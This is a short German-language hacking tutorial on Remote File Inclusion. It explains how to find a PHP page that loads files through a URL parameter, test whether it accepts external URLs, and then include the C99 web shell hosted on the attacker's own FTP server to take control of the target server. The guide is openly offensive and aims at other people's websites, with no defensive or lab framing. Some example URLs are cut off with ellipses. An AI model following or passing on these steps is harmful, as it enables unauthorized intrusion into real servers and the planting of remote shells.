Autor:Blitzkrieg
Quelle:HBA-Crew
So nun erkläre ich euch mal eine RFI.
Ich gehe das einfach mal Schritt für Schritt durch, sollte am verständlichsten sein.
Also ich surfe zum Beispiel gerade auf einer seite und sehe in meiner URL Leiste
folgende Adresse:
www.MeineHomepage.de/index.php?site=index.php
Damit wird der Content bzw. die ganze index.php geladen.Klingt komisch aber
der Link würde genausogut so funktionieren:
http://www.MeineHomepage.de/index.ph…=impressum.php
Ich denke ihr habt das Prinzip verstanden.
Und genau diesen ‘Fehler’ vom Administrator nutzen wir wie folgt aus.
Ihr könntet erstmal testen ob auch andere Links akzeptiert werden, dazu
wendet ihr einfach folgendes an:
http://www.MeineHomepage.de/index.ph…tp://google.de
Sollte er nun Google aufrufen habt ihr schon so gut wie gewonnen, sollte er
es nicht tun müsst ihr euch eine andere Seite zum ausprobieren suchen.
Nun weiter, dein Browser zeigt Google und alles ist super.
Nun lädst du dir eine Shell auf deinen eigenen FTP, die bekannteste Shell
dürfte hier wohl genannt werden: Die C99 Shell.
Fügt einfach diesen Code in eine Textdatei und speichert sie als c99.php vergesst nicht bei Dateityp „Alle Dateien“ auszuwählen.
Speichert sie auch nochmal als einfache .txt Datei, dazu später mehr.
Nun ladet die C99 auf euren FTP hoch.Fertig? Ok.
Jetzt gebt ihr folgendes in den Browser ein:
http://www.MeineHomepage.de/index.ph…ftp.de/c99.php
Nun wird ie C99 Shell geladen und ihr habt Zugriff auf den Server.
Sollte es nicht so sein könnt ihr den Pfad zur C99.txt angeben, dann zeigt er
die Textfile welche aber PHP beinhaltet und somit das selbe wie die PHP Datei erzielt: Serverzugriff
